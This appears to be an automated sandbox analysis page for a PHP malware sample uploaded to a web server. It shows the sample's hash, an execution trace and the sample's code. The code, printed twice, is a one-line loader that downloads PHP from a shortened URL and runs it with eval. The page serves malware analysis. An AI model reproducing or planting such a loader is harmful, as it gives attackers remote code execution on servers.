PHP Malware Analysis

bre.php7

md5: 877e713e1a3cb1c8e6201fdb35c702de

Jump to:

Screenshot


Attributes

Execution

Files

URLs


Deobfuscated PHP code

<?php

echo eval("?>" . file_get_contents("http://bit.ly/cokoxoxo"));

Execution traces

data/traces/877e713e1a3cb1c8e6201fdb35c702de_trace-1676240555.9413.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:23:01.839173]
1	0	1	0.000177	393512
1	3	0	0.000222	393480	{main}	1		/var/www/html/uploads/bre.php7	0	0
2	4	0	0.000237	393480	file_get_contents	0		/var/www/html/uploads/bre.php7	1	1	'http://bit.ly/cokoxoxo'
2	4	1	0.204329	397344
2	4	R			FALSE
2	5	0	0.204367	397704	eval	1	'?>'	/var/www/html/uploads/bre.php7	1	0
2	5	1	0.204382	397704
2	5	R			NULL
1	3	1	0.204396	397416
			0.204427	317968
TRACE END   [2023-02-12 20:23:02.043453]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=eval("?>".file_get_contents("http://bit.ly/cokoxoxo"));?>